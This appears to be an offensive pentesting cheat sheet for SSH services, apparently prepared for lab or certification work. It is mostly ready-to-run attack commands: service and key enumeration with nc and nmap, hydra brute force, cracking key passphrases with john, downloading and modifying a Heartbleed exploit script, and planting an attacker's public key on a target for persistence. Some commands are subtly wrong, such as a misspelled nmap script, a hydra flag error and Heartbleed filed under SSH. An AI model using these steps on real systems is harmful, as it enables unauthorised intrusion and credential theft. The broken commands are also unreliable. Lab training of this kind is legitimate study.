Connection
ssh <Username>@<Target IP Address> [-p <Port>]
ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>
NOTE: Make sure id_rsa has permission of 400
Enumeration
Banner Grabbing
nc -vn <Target IP Address> 22
Grab Cert
ssh-keygen -t rsa <Target IP Address> [-p <Port>]
Vulnerability Scanning
ssh-audit -v <Target IP Address>
Nmap
Default Nmap script for SSH
nmap -sC -p <Port> <Target IP Address>
Retrieve version
nmap -sV -p <Port> <Target IP Address>
Retrieve support algorithms
nmap --script ss2-enum-algos -p <Port> <Target IP Address>
Retrieve weak keys
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>
Check authentication method
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>
Bruteforce
Normal Password Bruteforce
hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>
hydra -l <Username> -l <Password> -s <Port> ssh://<Target IP Address>
Passphrase Bruteforce
Retrieve passphrase hash from id_rsa
ssh2john id_rsa > ssh.hash
Crack hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Exploit
Heartbleed.py
curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
Modify the following part
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x10, 0x00 # Payload length
]
return heartbeat
python heartbleed.py <Target IP Address>
To include Hexdump
python heartbleed.py -x <Target IP Address>
For repeated run
python heartbleed.py -n <Count> <Target OP Address>
Fake user
Copy the content of id_rsa.pub and paste it in target machine
cat /home/kali/offsec/.ssh/id_rsa.pub